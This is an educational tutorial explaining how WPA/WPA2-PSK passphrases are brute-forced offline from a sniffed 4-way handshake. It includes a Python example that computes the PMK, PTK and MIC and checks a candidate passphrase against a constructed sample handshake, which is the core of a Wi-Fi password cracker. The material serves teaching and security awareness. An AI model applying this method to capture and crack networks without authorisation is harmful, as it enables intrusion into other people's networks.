Wi-Fu - Attacking WPA-PSK - Part 2


  • 5/21/2018 Wi-Fu - Attacking WPA-PSK - Part 2


    Attacking WPA-PSK - Part 2


    Category: WPA/2

    Published on Saturday, 18 January 2014 19:30

    Recap

    The image below shows a basic flow of the information required to derive the PSK and PTK for a WPA network.

    There is a lot of information that goes between the wireless client and access point. But when you think about it, you will realise that all of these parameters, bar one, are sent in plaintext. An attacker silently sniffing the network traffic will learn all of these values, except the original passphrase entered by the user.

    Bruteforce

    Because each guess requires computationally expensive operations, the process of bruteforcing the passphrase is rather slow.

    1. The attacker makes a guess at the passphrase (from a dictionary or other wordlist source).

    2. This passphrase is used with the SSID and put through the PBKDF2 function, producing a PSK (which may or may not be correct).

    3. This PSK is used with the captured information from the 4-way handshake and put through the PBKDF2 function again. This produces a PTK.

    4. The attacker uses this information to calculate a MIC, which is then checked against the MIC in the captured packets.

    5. If the MIC matches, the original passphrase was correct; if not, the entire process is repeated with the next passphrase.


    Copyright 2014 - Material is for educational purposes only


    A Word on WPA2-PSK

    Even though WPA2 uses different encryption schemes and functions, what we are really attacking is a weak passphrase, so the attack process for WPA2 is identical to WPA.
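The per-guess check from the Bruteforce steps and the WPA/WPA2 note above, as an added example that is not part of the original article: it shows why every candidate costs 4096 HMAC-SHA1 rounds, why the SSID acts as a salt, and that only the MIC hash differs between WPA and WPA2. Function names and the handshake values are assumptions constructed for illustration, and the PTK step is written as the 802.11i PRF (HMAC-SHA1 with the "Pairwise key expansion" label).

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # Step 2: the SSID is the salt, so the same passphrase gives a different PSK per SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, length=64):
    # Step 3: 802.11i PRF = HMAC-SHA1(PMK, label || 0x00 || data || counter), repeated.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out, counter = b"", 0
    while len(out) < length:
        block = b"Pairwise key expansion\x00" + data + bytes([counter])
        out += hmac.new(pmk, block, hashlib.sha1).digest()
        counter += 1
    return out[:length]

def eapol_mic(ptk, eapol_frame, wpa2=True):
    # Step 4: the MIC is keyed with the KCK (first 16 bytes of the PTK) and computed over
    # the EAPOL frame with its MIC field zeroed. WPA uses HMAC-MD5, WPA2 HMAC-SHA1.
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(ptk[:16], eapol_frame, digest).digest()[:16]

def passphrase_matches(candidate, ssid, hs, wpa2=True):
    # Step 5: a candidate is correct only if it reproduces the captured MIC.
    ptk = derive_ptk(derive_pmk(candidate, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk, hs["eapol"], wpa2), hs["mic"])

def constructed_handshake(passphrase, ssid, wpa2=True):
    # Constructed sample values (not a real capture): MACs, nonces and a zero-filled
    # stand-in for the EAPOL-Key frame, with the MIC computed from the given passphrase.
    hs = {"ap_mac": bytes.fromhex("020000000001"),
          "sta_mac": bytes.fromhex("020000000002"),
          "anonce": bytes(range(32)), "snonce": bytes(range(32, 64)),
          "eapol": b"\x01\x03\x00\x5f" + bytes(95)}
    ptk = derive_ptk(derive_pmk(passphrase, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk, hs["eapol"], wpa2)
    return hs

if __name__ == "__main__":
    hs = constructed_handshake("correct horse battery staple", "ExampleNet")
    print(passphrase_matches("correct horse battery staple", "ExampleNet", hs))
    print(passphrase_matches("password123", "ExampleNet", hs))
```

Because the PSK depends on the SSID, precomputed tables only apply to the SSID they were built for, and a long, non-dictionary passphrase is what makes the 4096-round cost per guess add up.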
